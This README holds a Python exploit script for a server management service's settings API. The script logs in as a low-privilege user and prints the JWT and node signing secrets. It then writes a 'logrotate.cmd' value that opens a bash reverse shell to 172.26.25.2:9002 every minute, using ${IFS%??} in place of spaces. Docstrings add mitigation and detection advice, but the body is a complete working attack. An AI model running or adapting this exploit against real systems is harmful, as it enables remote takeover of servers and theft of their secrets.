README.md
import requests
def login(login_url, login_data):
    """POST the credentials as JSON and return the session token.

    Returns the value of the ``token`` key from the JSON reply when the
    server answers 200, otherwise ``None``. The token is echoed to stdout,
    so it ends up in any terminal log or CI capture of this run.
    """
    reply = requests.post(login_url, json=login_data)

    # Anything other than 200 is treated as a failed login.
    if reply.status_code != 200:
        print("Login failed with status code:", reply.status_code)
        print("Response:", reply.text)
        return None

    print("Login successful!")
    session_token = reply.json().get("token")
    print("Obtained Token:", session_token)
    return session_token
def get_settings(settings_url, token):
    """Fetch the settings document and pull out the two server secrets.

    Returns ``(jwt_secret, node_secret)`` on a 200 reply and ``None``
    otherwise, so a caller must check for ``None`` before unpacking.

    Defensive reading: the script expects ``server.jwt_secret`` and
    ``server.node_secret`` to be present in the settings response. If the
    service really returns them, any holder of a valid token can read the
    signing secret; a settings API should redact such fields on read.
    """
    # The token is sent as the bare header value, with no scheme prefix.
    request_headers = {
        "Authorization": f"{token}",
        "Accept": "application/json",
        "Content-Type": "application/json"
    }
    reply = requests.get(settings_url, headers=request_headers)

    if reply.status_code != 200:
        print("Failed to retrieve settings with status code:", reply.status_code)
        print("Response:", reply.text)
        return None

    server_section = reply.json().get("server", {})
    jwt_secret = server_section.get("jwt_secret")
    node_secret = server_section.get("node_secret")
    print("JWT Secret:", jwt_secret)
    print("Node Secret:", node_secret)
    return jwt_secret, node_secret
def exploit_settings(settings_url, token, jwt_secret, node_secret):
    """POST a full settings document whose ``logrotate.cmd`` is a shell command.

    The request replaces the whole settings object; the previously read
    ``jwt_secret`` and ``node_secret`` are written back unchanged so the
    existing token stays valid. Prints the outcome and returns ``None``.

    Defensive reading: the security-relevant field is ``logrotate.cmd``.
    According to the author's own comments, the service runs that string
    on the configured interval. The root cause is a settings API that takes
    an executable command from request input. Mitigation on the server side
    is to stop accepting the command over the API (fixed binary or a strict
    allowlist) and to require an administrative role for settings writes.
    For detection, alert on settings writes that change ``logrotate.cmd``
    and on interactive shells or outbound connections spawned by the
    service process.
    """
    request_headers = {
        "Authorization": f"{token}",
        "Accept": "application/json",
        "Content-Type": "application/json"
    }

    auth_section = {
        "ip_white_list": None,
        "ban_threshold_minutes": 10,
        "max_attempts": 10
    }

    logrotate_section = {
        "enabled": True,
        # Author's note: command to be executed on the vulnerable service.
        # ${IFS%??} stands in for spaces inside the command string.
        "cmd": "bash -c bash${IFS%??}-i${IFS%??}>&${IFS%??}/dev/tcp/172.26.25.2/9002${IFS%??}<&1",
        # Author's note: number of minutes between executions.
        "interval": 1
    }

    # Both sections are submitted with every field blank.
    nginx_section = dict.fromkeys(
        (
            "access_log_path",
            "error_log_path",
            "config_dir",
            "pid_path",
            "test_config_cmd",
            "reload_cmd",
            "restart_cmd",
        ),
        "",
    )
    openai_section = dict.fromkeys(("base_url", "token", "proxy", "model"), "")

    server_section = {
        "http_host": "0.0.0.0",
        "http_port": "7080",
        "run_mode": "debug",
        "jwt_secret": f"{jwt_secret}",
        "node_secret": f"{node_secret}",
        "http_challenge_port": "7080",
        # Value appears as found on the page (looks like e-mail obfuscation).
        "email": "[email protected]",
        "database": "data",
        "start_cmd": "login",
        "ca_dir": "",
        "demo": False,
        "page_size": 10,
        "github_proxy": "",
        "cert_renewal_interval": 7,
        "recursive_nameservers": [],
        "skip_installation": False,
        "insecure_skip_verify": False,
        "name": ""
    }

    # Section order matches the original document.
    payload = {
        "auth": auth_section,
        "logrotate": logrotate_section,
        "nginx": nginx_section,
        "openai": openai_section,
        "server": server_section,
    }

    reply = requests.post(settings_url, json=payload, headers=request_headers)
    if reply.status_code != 200:
        print("Exploit failed with status code:", reply.status_code)
        print("Response:", reply.text)
        return

    print("Exploit triggered successfully.")
    print("Response:", reply.json())
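if __name__ == "__main__":
    # Both endpoints point at a loopback instance on port 7080.
    login_url = 'http://127.0.0.1:7080/api/login'
    settings_url = 'http://127.0.0.1:7080/api/settings'
    # NOTE(review): the account name suggests a non-administrative user. If
    # so, the finding includes a missing authorization check on the settings
    # endpoint. Confirm against the advisory this README belongs to.
    login_data = {
        "name": "unauthorized_user",
        "password": "basic"
    }
    token = login(login_url, login_data)
    if token:
        # get_settings() returns None on a non-200 reply; unpacking that
        # directly raises TypeError, so check before destructuring.
        server_secrets = get_settings(settings_url, token)
        if server_secrets is not None:
            jwt_secret, node_secret = server_secrets
            exploit_settings(settings_url, token, jwt_secret, node_secret)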